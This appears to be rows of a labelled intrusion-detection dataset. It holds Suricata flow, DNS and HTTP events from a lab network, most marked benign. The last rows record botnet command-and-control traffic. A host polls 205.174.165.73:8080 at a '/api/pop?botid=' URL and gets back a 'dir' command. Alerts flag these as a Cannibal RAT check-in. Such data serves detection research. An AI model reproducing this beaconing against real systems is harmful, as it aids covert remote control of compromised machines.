event_type: flow, proto: UDP, app_proto: dns, flow_pkts_toserver: 2, flow_pkts_toclient: 2, flow_bytes_toserver: 172, flow_bytes_toclient: 272, flow_age: 0, flow_state: established, flow_reason: timeout ; pcap_cnt: 73700, event_type: dns, proto: UDP, dns_type: query, dns_id: 50653, dns_rrname: _kerberos._tcp.TESTBED1.CA, dns_rrtype: SRV, dns_tx_id: 0 ; pcap_cnt: 73701, event_type: dns, proto: UDP, dns_type: query, dns_id: 50653, dns_rrname: _kerberos._tcp.TESTBED1.CA, dns_rrtype: SRV, dns_tx_id: 1 ; pcap_cnt: 73702, event_type: dns, proto: UDP, dns_version: 2, dns_type: answer, dns_id: 50653, dns_flags: 8580, dns_qr: True, dns_aa: True, dns_rd: True, dns_ra: True, dns_rrname: _kerberos._tcp.TESTBED1.CA, dns_rrtype: SRV, dns_rcode: NOERROR, dns_answers_0_rrname: _kerberos._tcp.TESTBED1.CA, dns_answers_0_rrtype: SRV, dns_answers_0_ttl: 600 ; pcap_cnt: 73703, event_type: dns, proto: UDP, dns_version: 2, dns_type: answer, dns_id: 50653, dns_flags: 8580, dns_qr: True, dns_aa: True, dns_rd: True, dns_ra: True, dns_rrname: _kerberos._tcp.TESTBED1.CA, dns_rrtype: SRV, dns_rcode: NOERROR, dns_answers_0_rrname: _kerberos._tcp.TESTBED1.CA, dns_answers_0_rrtype: SRV, dns_answers_0_ttl: 600
false
BENIGN
false
12:07:18
116
Friday
[]
581
normal
1,204,411
192.168.10.16-49776-192.168.10.3-3268-6
['flow', 'anomaly']
event_type: flow, proto: TCP, app_proto: tls, flow_pkts_toserver: 110, flow_pkts_toclient: 67, flow_bytes_toserver: 27814, flow_bytes_toclient: 24080, flow_age: 894, flow_state: closed, flow_reason: timeout, tcp_tcp_flags: 1f, tcp_tcp_flags_ts: 1b, tcp_tcp_flags_tc: 1e, tcp_syn: True, tcp_fin: True, tcp_rst: True, tcp_psh: True, tcp_ack: True, tcp_state: closed ; pcap_cnt: 73691, event_type: anomaly, proto: TCP, tx_id: 0, anomaly_app_proto: tls, anomaly_type: applayer, anomaly_event: INVALID_RECORD_TYPE, anomaly_layer: proto_parser
false
BENIGN
false
12:07:18
65,877
Friday
[]
218
normal
1,204,409
192.168.10.16-41458-192.168.10.3-53-17
['flow', 'dns', 'dns', 'dns', 'dns']
event_type: flow, proto: UDP, app_proto: dns, flow_pkts_toserver: 2, flow_pkts_toclient: 2, flow_bytes_toserver: 148, flow_bytes_toclient: 242, flow_age: 0, flow_state: established, flow_reason: timeout ; pcap_cnt: 73730, event_type: dns, proto: UDP, dns_type: query, dns_id: 45227, dns_rrname: DC.Testbed1.ca, dns_rrtype: AAAA, dns_tx_id: 0 ; pcap_cnt: 73731, event_type: dns, proto: UDP, dns_type: query, dns_id: 45227, dns_rrname: DC.Testbed1.ca, dns_rrtype: AAAA, dns_tx_id: 1 ; pcap_cnt: 73734, event_type: dns, proto: UDP, dns_version: 2, dns_type: answer, dns_id: 45227, dns_flags: 8580, dns_qr: True, dns_aa: True, dns_rd: True, dns_ra: True, dns_rrname: DC.Testbed1.ca, dns_rrtype: AAAA, dns_rcode: NOERROR, dns_authorities_0_rrname: Testbed1.ca, dns_authorities_0_rrtype: SOA, dns_authorities_0_ttl: 3600, dns_authorities_0_soa_mname: DC.Testbed1.ca, dns_authorities_0_soa_rname: hostmaster.Testbed1.ca, dns_authorities_0_soa_serial: 59, dns_authorities_0_soa_refresh: 900, dns_authorities_0_soa_retry: 600, dns_authorities_0_soa_expire: 86400, dns_authorities_0_soa_minimum: 3600 ; pcap_cnt: 73735, event_type: dns, proto: UDP, dns_version: 2, dns_type: answer, dns_id: 45227, dns_flags: 8580, dns_qr: True, dns_aa: True, dns_rd: True, dns_ra: True, dns_rrname: DC.Testbed1.ca, dns_rrtype: AAAA, dns_rcode: NOERROR, dns_authorities_0_rrname: Testbed1.ca, dns_authorities_0_rrtype: SOA, dns_authorities_0_ttl: 3600, dns_authorities_0_soa_mname: DC.Testbed1.ca, dns_authorities_0_soa_rname: hostmaster.Testbed1.ca, dns_authorities_0_soa_serial: 59, dns_authorities_0_soa_refresh: 900, dns_authorities_0_soa_retry: 600, dns_authorities_0_soa_expire: 86400, dns_authorities_0_soa_minimum: 3600
false
BENIGN
false
12:07:18
177
Friday
[]
777
normal
1,204,419
192.168.10.16-46535-192.168.10.3-53-17
['flow', 'dns', 'dns', 'dns', 'dns']
event_type: flow, proto: UDP, app_proto: dns, flow_pkts_toserver: 2, flow_pkts_toclient: 2, flow_bytes_toserver: 186, flow_bytes_toclient: 308, flow_age: 0, flow_state: established, flow_reason: timeout ; pcap_cnt: 73716, event_type: dns, proto: UDP, dns_type: query, dns_id: 53393, dns_rrname: _kerberos-master._udp.TESTBED1.CA, dns_rrtype: SRV, dns_tx_id: 0 ; pcap_cnt: 73717, event_type: dns, proto: UDP, dns_type: query, dns_id: 53393, dns_rrname: _kerberos-master._udp.TESTBED1.CA, dns_rrtype: SRV, dns_tx_id: 1 ; pcap_cnt: 73718, event_type: dns, proto: UDP, dns_version: 2, dns_type: answer, dns_id: 53393, dns_flags: 8583, dns_qr: True, dns_aa: True, dns_rd: True, dns_ra: True, dns_rrname: _kerberos-master._udp.TESTBED1.CA, dns_rrtype: SRV, dns_rcode: NXDOMAIN, dns_authorities_0_rrname: testbed1.ca, dns_authorities_0_rrtype: SOA, dns_authorities_0_ttl: 3600, dns_authorities_0_soa_mname: dc.testbed1.ca, dns_authorities_0_soa_rname: hostmaster.testbed1.ca, dns_authorities_0_soa_serial: 59, dns_authorities_0_soa_refresh: 900, dns_authorities_0_soa_retry: 600, dns_authorities_0_soa_expire: 86400, dns_authorities_0_soa_minimum: 3600 ; pcap_cnt: 73719, event_type: dns, proto: UDP, dns_version: 2, dns_type: answer, dns_id: 53393, dns_flags: 8583, dns_qr: True, dns_aa: True, dns_rd: True, dns_ra: True, dns_rrname: _kerberos-master._udp.TESTBED1.CA, dns_rrtype: SRV, dns_rcode: NXDOMAIN, dns_authorities_0_rrname: testbed1.ca, dns_authorities_0_rrtype: SOA, dns_authorities_0_ttl: 3600, dns_authorities_0_soa_mname: dc.testbed1.ca, dns_authorities_0_soa_rname: hostmaster.testbed1.ca, dns_authorities_0_soa_serial: 59, dns_authorities_0_soa_refresh: 900, dns_authorities_0_soa_retry: 600, dns_authorities_0_soa_expire: 86400, dns_authorities_0_soa_minimum: 3600
false
BENIGN
false
12:07:18
165
Friday
[]
823
normal
1,204,415
192.168.10.16-17760-192.168.10.3-53-17
['flow', 'dns', 'dns', 'dns', 'dns']
event_type: flow, proto: UDP, app_proto: dns, flow_pkts_toserver: 2, flow_pkts_toclient: 2, flow_bytes_toserver: 172, flow_bytes_toclient: 272, flow_age: 0, flow_state: established, flow_reason: timeout ; pcap_cnt: 73720, event_type: dns, proto: UDP, dns_type: query, dns_id: 36156, dns_rrname: _kerberos._udp.TESTBED1.CA, dns_rrtype: SRV, dns_tx_id: 0 ; pcap_cnt: 73721, event_type: dns, proto: UDP, dns_type: query, dns_id: 36156, dns_rrname: _kerberos._udp.TESTBED1.CA, dns_rrtype: SRV, dns_tx_id: 1 ; pcap_cnt: 73722, event_type: dns, proto: UDP, dns_version: 2, dns_type: answer, dns_id: 36156, dns_flags: 8580, dns_qr: True, dns_aa: True, dns_rd: True, dns_ra: True, dns_rrname: _kerberos._udp.TESTBED1.CA, dns_rrtype: SRV, dns_rcode: NOERROR, dns_answers_0_rrname: _kerberos._udp.TESTBED1.CA, dns_answers_0_rrtype: SRV, dns_answers_0_ttl: 600 ; pcap_cnt: 73723, event_type: dns, proto: UDP, dns_version: 2, dns_type: answer, dns_id: 36156, dns_flags: 8580, dns_qr: True, dns_aa: True, dns_rd: True, dns_ra: True, dns_rrname: _kerberos._udp.TESTBED1.CA, dns_rrtype: SRV, dns_rcode: NOERROR, dns_answers_0_rrname: _kerberos._udp.TESTBED1.CA, dns_answers_0_rrtype: SRV, dns_answers_0_ttl: 600
false
BENIGN
false
12:07:18
152
Friday
[]
581
normal
1,204,416
192.168.10.16-43411-192.168.10.3-53-17
['flow', 'dns', 'dns', 'dns', 'dns']
event_type: flow, proto: UDP, app_proto: dns, flow_pkts_toserver: 2, flow_pkts_toclient: 2, flow_bytes_toserver: 172, flow_bytes_toclient: 272, flow_age: 0, flow_state: established, flow_reason: timeout ; pcap_cnt: 73724, event_type: dns, proto: UDP, dns_type: query, dns_id: 53830, dns_rrname: _kerberos._tcp.TESTBED1.CA, dns_rrtype: SRV, dns_tx_id: 0 ; pcap_cnt: 73725, event_type: dns, proto: UDP, dns_type: query, dns_id: 53830, dns_rrname: _kerberos._tcp.TESTBED1.CA, dns_rrtype: SRV, dns_tx_id: 1 ; pcap_cnt: 73726, event_type: dns, proto: UDP, dns_version: 2, dns_type: answer, dns_id: 53830, dns_flags: 8580, dns_qr: True, dns_aa: True, dns_rd: True, dns_ra: True, dns_rrname: _kerberos._tcp.TESTBED1.CA, dns_rrtype: SRV, dns_rcode: NOERROR, dns_answers_0_rrname: _kerberos._tcp.TESTBED1.CA, dns_answers_0_rrtype: SRV, dns_answers_0_ttl: 600 ; pcap_cnt: 73727, event_type: dns, proto: UDP, dns_version: 2, dns_type: answer, dns_id: 53830, dns_flags: 8580, dns_qr: True, dns_aa: True, dns_rd: True, dns_ra: True, dns_rrname: _kerberos._tcp.TESTBED1.CA, dns_rrtype: SRV, dns_rcode: NOERROR, dns_answers_0_rrname: _kerberos._tcp.TESTBED1.CA, dns_answers_0_rrtype: SRV, dns_answers_0_ttl: 600
false
BENIGN
false
12:07:18
198
Friday
[]
585
normal
1,204,417
192.168.10.16-63655-192.168.10.3-53-17
['flow', 'dns', 'dns', 'dns', 'dns']
event_type: flow, proto: UDP, app_proto: dns, flow_pkts_toserver: 2, flow_pkts_toclient: 2, flow_bytes_toserver: 148, flow_bytes_toclient: 180, flow_age: 0, flow_state: established, flow_reason: timeout ; pcap_cnt: 73728, event_type: dns, proto: UDP, dns_type: query, dns_id: 43535, dns_rrname: DC.Testbed1.ca, dns_rrtype: A, dns_tx_id: 0 ; pcap_cnt: 73729, event_type: dns, proto: UDP, dns_type: query, dns_id: 43535, dns_rrname: DC.Testbed1.ca, dns_rrtype: A, dns_tx_id: 1 ; pcap_cnt: 73732, event_type: dns, proto: UDP, dns_version: 2, dns_type: answer, dns_id: 43535, dns_flags: 8580, dns_qr: True, dns_aa: True, dns_rd: True, dns_ra: True, dns_rrname: DC.Testbed1.ca, dns_rrtype: A, dns_rcode: NOERROR, dns_answers_0_rrname: DC.Testbed1.ca, dns_answers_0_rrtype: A, dns_answers_0_ttl: 3600, dns_answers_0_rdata: 192.168.10.3, dns_grouped_A_0: 192.168.10.3 ; pcap_cnt: 73733, event_type: dns, proto: UDP, dns_version: 2, dns_type: answer, dns_id: 43535, dns_flags: 8580, dns_qr: True, dns_aa: True, dns_rd: True, dns_ra: True, dns_rrname: DC.Testbed1.ca, dns_rrtype: A, dns_rcode: NOERROR, dns_answers_0_rrname: DC.Testbed1.ca, dns_answers_0_rrtype: A, dns_answers_0_ttl: 3600, dns_answers_0_rdata: 192.168.10.3, dns_grouped_A_0: 192.168.10.3
false
BENIGN
false
12:07:18
166
Friday
[]
605
normal
1,204,418
192.168.10.9-1841-205.174.165.73-8080-6
['flow', 'http']
event_type: flow, proto: TCP, app_proto: http, flow_pkts_toserver: 5, flow_pkts_toclient: 4, flow_bytes_toserver: 494, flow_bytes_toclient: 368, flow_age: 1, flow_state: closed, flow_reason: timeout, metadata_flowbits_0: http.dottedquadhost, tcp_tcp_flags: 1b, tcp_tcp_flags_ts: 1b, tcp_tcp_flags_tc: 1b, tcp_syn: True, tcp_fin: True, tcp_psh: True, tcp_ack: True, tcp_state: closed ; pcap_cnt: 3897939, event_type: http, proto: TCP, tx_id: 0, metadata_flowbits_0: http.dottedquadhost, http_hostname: 205.174.165.73, http_http_port: 8080, http_url: /api/pop?botid=mitacs-pc6&sysinfo=Windows%207, http_http_user_agent: python-requests/2.14.2, http_http_content_type: text/html, http_http_method: GET, http_protocol: HTTP/1.1, http_status: 200, http_length: 0
true
Botnet
true
13:04:13
135,442
Friday
[{'timestamp': '2017-07-07T13:04:14.125383+0000', 'flow_id': 1217195993275755, 'pcap_cnt': 3897939, 'event_type': 'alert', 'src_ip': '192.168.10.9', 'src_port': 1841, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': 'b8:ac:6f:1d:1f:6c', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2812028, 'rev': 3, 'signature': 'ETPRO POLICY Python Requests Suspicious User Agent', 'category': 'Potential Corporate Privacy Violation', 'severity': 1, 'metadata': {'created_at': ['2015_07_16'], 'updated_at': ['2020_08_17']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc6&sysinfo=Windows%207', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 434, 'bytes_toclient': 308, 'start': '2017-07-07T13:04:13.990571+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzYmc3lzaW5mbz1XaW5kb3dzJTIwNyBIVFRQLzEuMQ0KSG9zdDogMjA1LjE3NC4xNjUuNzM6ODA4MA0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlDQpBY2NlcHQ6ICovKg0KVXNlci1BZ2VudDogcHl0aG9uLXJlcXVlc3RzLzIuMTQuMg0KDQo=', 'payload_printable': 'GET /api/pop?botid=mitacs-pc6&sysinfo=Windows%207 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxuKxvHR9sCABFAAAobJJAAIAGUJTAqAoJza6lSQcxH5BcaRkUE91FTFARAQB7wgAAAAAAAAAA', 'packet_info': {'linktype': 1}}, {'timestamp': '2017-07-07T13:04:14.125383+0000', 'flow_id': 1217195993275755, 'pcap_cnt': 3897939, 'event_type': 'alert', 'src_ip': '192.168.10.9', 'src_port': 1841, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': 'b8:ac:6f:1d:1f:6c', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2829850, 'rev': 2, 'signature': 'ETPRO TROJAN Py/Cannibal RAT Checkin M1', 'category': 'A Network Trojan was Detected', 'severity': 1, 'metadata': {'affected_product': ['Windows_XP_Vista_7_8_10_Server_32_64_Bit'], 'attack_target': ['Client_Endpoint'], 'created_at': ['2018_03_01'], 'deployment': ['Perimeter'], 'former_category': ['MALWARE'], 'malware_family': ['Cannibal'], 'performance_impact': ['Moderate'], 'signature_severity': ['Major'], 'tag': ['RAT'], 'updated_at': ['2020_08_24']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc6&sysinfo=Windows%207', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 434, 'bytes_toclient': 308, 'start': '2017-07-07T13:04:13.990571+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzYmc3lzaW5mbz1XaW5kb3dzJTIwNyBIVFRQLzEuMQ0KSG9zdDogMjA1LjE3NC4xNjUuNzM6ODA4MA0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlDQpBY2NlcHQ6ICovKg0KVXNlci1BZ2VudDogcHl0aG9uLXJlcXVlc3RzLzIuMTQuMg0KDQo=', 'payload_printable': 'GET /api/pop?botid=mitacs-pc6&sysinfo=Windows%207 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxuKxvHR9sCABFAAAobJJAAIAGUJTAqAoJza6lSQcxH5BcaRkUE91FTFARAQB7wgAAAAAAAAAA', 'packet_info': {'linktype': 1}}]
307
attack
1,233,261
192.168.10.9-1845-205.174.165.73-8080-6
['flow', 'http']
event_type: flow, proto: TCP, app_proto: http, flow_pkts_toserver: 5, flow_pkts_toclient: 4, flow_bytes_toserver: 494, flow_bytes_toclient: 368, flow_age: 0, flow_state: closed, flow_reason: timeout, metadata_flowbits_0: http.dottedquadhost, tcp_tcp_flags: 1b, tcp_tcp_flags_ts: 1b, tcp_tcp_flags_tc: 1b, tcp_syn: True, tcp_fin: True, tcp_psh: True, tcp_ack: True, tcp_state: closed ; pcap_cnt: 3900569, event_type: http, proto: TCP, tx_id: 0, metadata_flowbits_0: http.dottedquadhost, http_hostname: 205.174.165.73, http_http_port: 8080, http_url: /api/pop?botid=mitacs-pc6&sysinfo=Windows%207, http_http_user_agent: python-requests/2.14.2, http_http_content_type: text/html, http_http_method: GET, http_protocol: HTTP/1.1, http_status: 200, http_length: 0
true
Botnet
true
13:04:24
128,618
Friday
[{'timestamp': '2017-07-07T13:04:24.258871+0000', 'flow_id': 555259929296914, 'pcap_cnt': 3900569, 'event_type': 'alert', 'src_ip': '192.168.10.9', 'src_port': 1845, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': 'b8:ac:6f:1d:1f:6c', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2812028, 'rev': 3, 'signature': 'ETPRO POLICY Python Requests Suspicious User Agent', 'category': 'Potential Corporate Privacy Violation', 'severity': 1, 'metadata': {'created_at': ['2015_07_16'], 'updated_at': ['2020_08_17']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc6&sysinfo=Windows%207', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 434, 'bytes_toclient': 308, 'start': '2017-07-07T13:04:24.131090+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzYmc3lzaW5mbz1XaW5kb3dzJTIwNyBIVFRQLzEuMQ0KSG9zdDogMjA1LjE3NC4xNjUuNzM6ODA4MA0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlDQpBY2NlcHQ6ICovKg0KVXNlci1BZ2VudDogcHl0aG9uLXJlcXVlc3RzLzIuMTQuMg0KDQo=', 'payload_printable': 'GET /api/pop?botid=mitacs-pc6&sysinfo=Windows%207 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxuKxvHR9sCABFAAAobNFAAIAGUFXAqAoJza6lSQc1H5AaEOw8+xQJ8VARAQA/EgAAAAAAAAAA', 'packet_info': {'linktype': 1}}, {'timestamp': '2017-07-07T13:04:24.258871+0000', 'flow_id': 555259929296914, 'pcap_cnt': 3900569, 'event_type': 'alert', 'src_ip': '192.168.10.9', 'src_port': 1845, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': 'b8:ac:6f:1d:1f:6c', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2829850, 'rev': 2, 'signature': 'ETPRO TROJAN Py/Cannibal RAT Checkin M1', 'category': 'A Network Trojan was Detected', 'severity': 1, 'metadata': {'affected_product': ['Windows_XP_Vista_7_8_10_Server_32_64_Bit'], 'attack_target': ['Client_Endpoint'], 'created_at': ['2018_03_01'], 'deployment': ['Perimeter'], 'former_category': ['MALWARE'], 'malware_family': ['Cannibal'], 'performance_impact': ['Moderate'], 'signature_severity': ['Major'], 'tag': ['RAT'], 'updated_at': ['2020_08_24']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc6&sysinfo=Windows%207', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 0}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 3, 'bytes_toserver': 434, 'bytes_toclient': 308, 'start': '2017-07-07T13:04:24.131090+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzYmc3lzaW5mbz1XaW5kb3dzJTIwNyBIVFRQLzEuMQ0KSG9zdDogMjA1LjE3NC4xNjUuNzM6ODA4MA0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlDQpBY2NlcHQ6ICovKg0KVXNlci1BZ2VudDogcHl0aG9uLXJlcXVlc3RzLzIuMTQuMg0KDQo=', 'payload_printable': 'GET /api/pop?botid=mitacs-pc6&sysinfo=Windows%207 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxuKxvHR9sCABFAAAobNFAAIAGUFXAqAoJza6lSQc1H5AaEOw8+xQJ8VARAQA/EgAAAAAAAAAA', 'packet_info': {'linktype': 1}}]
307
attack
1,233,365
192.168.10.9-1846-205.174.165.73-8080-6
['flow', 'http', 'fileinfo']
event_type: flow, proto: TCP, app_proto: http, flow_pkts_toserver: 6, flow_pkts_toclient: 5, flow_bytes_toserver: 554, flow_bytes_toclient: 428, flow_age: 0, flow_state: closed, flow_reason: timeout, metadata_flowbits_0: http.dottedquadhost, tcp_tcp_flags: 1b, tcp_tcp_flags_ts: 1b, tcp_tcp_flags_tc: 1b, tcp_syn: True, tcp_fin: True, tcp_psh: True, tcp_ack: True, tcp_state: closed ; pcap_cnt: 3903818, event_type: http, proto: TCP, tx_id: 0, metadata_flowbits_0: http.dottedquadhost, http_hostname: 205.174.165.73, http_http_port: 8080, http_url: /api/pop?botid=mitacs-pc6&sysinfo=Windows%207, http_http_user_agent: python-requests/2.14.2, http_http_content_type: text/html, http_http_method: GET, http_protocol: HTTP/1.1, http_status: 200, http_length: 3 ; pcap_cnt: 3903820, event_type: fileinfo, proto: TCP, metadata_flowbits_0: http.dottedquadhost, http_hostname: 205.174.165.73, http_http_port: 8080, http_url: /api/pop?botid=mitacs-pc6&sysinfo=Windows%207, http_http_user_agent: python-requests/2.14.2, http_http_content_type: text/html, http_http_method: GET, http_protocol: HTTP/1.1, http_status: 200, http_length: 3, app_proto: http, fileinfo_filename: /api/pop, fileinfo_gaps: False, fileinfo_state: CLOSED, fileinfo_stored: False, fileinfo_size: 3, fileinfo_tx_id: 0
true
Botnet
true
13:04:34
166,397
Friday
[{'timestamp': '2017-07-07T13:04:34.427450+0000', 'flow_id': 2139024825385171, 'pcap_cnt': 3903818, 'event_type': 'alert', 'src_ip': '192.168.10.9', 'src_port': 1846, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': 'b8:ac:6f:1d:1f:6c', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2812028, 'rev': 3, 'signature': 'ETPRO POLICY Python Requests Suspicious User Agent', 'category': 'Potential Corporate Privacy Violation', 'severity': 1, 'metadata': {'created_at': ['2015_07_16'], 'updated_at': ['2020_08_17']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc6&sysinfo=Windows%207', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 3, 'http_response_body_printable': 'dir', 'http_response_body': 'ZGly'}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 4, 'bytes_toserver': 434, 'bytes_toclient': 368, 'start': '2017-07-07T13:04:34.262355+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzYmc3lzaW5mbz1XaW5kb3dzJTIwNyBIVFRQLzEuMQ0KSG9zdDogMjA1LjE3NC4xNjUuNzM6ODA4MA0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlDQpBY2NlcHQ6ICovKg0KVXNlci1BZ2VudDogcHl0aG9uLXJlcXVlc3RzLzIuMTQuMg0KDQo=', 'payload_printable': 'GET /api/pop?botid=mitacs-pc6&sysinfo=Windows%207 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxuKxvHR9sCABFAAAobO5AAIAGUDjAqAoJza6lSQc2H5CqZtBCSMA+jVAQAQBIbgAAAAAAAAAA', 'packet_info': {'linktype': 1}}, {'timestamp': '2017-07-07T13:04:34.427450+0000', 'flow_id': 2139024825385171, 'pcap_cnt': 3903818, 'event_type': 'alert', 'src_ip': '192.168.10.9', 'src_port': 1846, 'dest_ip': '205.174.165.73', 'dest_port': 8080, 'proto': 'TCP', 'metadata': {'flowbits': ['http.dottedquadhost']}, 'ether': {'src_mac': 'b8:ac:6f:1d:1f:6c', 'dest_mac': '00:c1:b1:14:eb:31'}, 'tx_id': 0, 'alert': {'action': 'allowed', 'gid': 1, 'signature_id': 2829850, 'rev': 2, 'signature': 'ETPRO TROJAN Py/Cannibal RAT Checkin M1', 'category': 'A Network Trojan was Detected', 'severity': 1, 'metadata': {'affected_product': ['Windows_XP_Vista_7_8_10_Server_32_64_Bit'], 'attack_target': ['Client_Endpoint'], 'created_at': ['2018_03_01'], 'deployment': ['Perimeter'], 'former_category': ['MALWARE'], 'malware_family': ['Cannibal'], 'performance_impact': ['Moderate'], 'signature_severity': ['Major'], 'tag': ['RAT'], 'updated_at': ['2020_08_24']}}, 'http': {'hostname': '205.174.165.73', 'http_port': 8080, 'url': '/api/pop?botid=mitacs-pc6&sysinfo=Windows%207', 'http_user_agent': 'python-requests/2.14.2', 'http_content_type': 'text/html', 'http_method': 'GET', 'protocol': 'HTTP/1.1', 'status': 200, 'length': 3, 'http_response_body_printable': 'dir', 'http_response_body': 'ZGly'}, 'app_proto': 'http', 'flow': {'pkts_toserver': 4, 'pkts_toclient': 4, 'bytes_toserver': 434, 'bytes_toclient': 368, 'start': '2017-07-07T13:04:34.262355+0000'}, 'payload': 'R0VUIC9hcGkvcG9wP2JvdGlkPW1pdGFjcy1wYzYmc3lzaW5mbz1XaW5kb3dzJTIwNyBIVFRQLzEuMQ0KSG9zdDogMjA1LjE3NC4xNjUuNzM6ODA4MA0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlDQpBY2NlcHQ6ICovKg0KVXNlci1BZ2VudDogcHl0aG9uLXJlcXVlc3RzLzIuMTQuMg0KDQo=', 'payload_printable': 'GET /api/pop?botid=mitacs-pc6&sysinfo=Windows%207 HTTP/1.1\r\nHost: 205.174.165.73:8080\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.14.2\r\n\r\n', 'stream': 1, 'packet': 'AMGxFOsxuKxvHR9sCABFAAAobO5AAIAGUDjAqAoJza6lSQc2H5CqZtBCSMA+jVAQAQBIbgAAAAAAAAAA', 'packet_info': {'linktype': 1}}]
508
attack
1,233,456
192.168.10.9-1847-205.174.165.73-8080-6
['flow', 'anomaly', 'http']
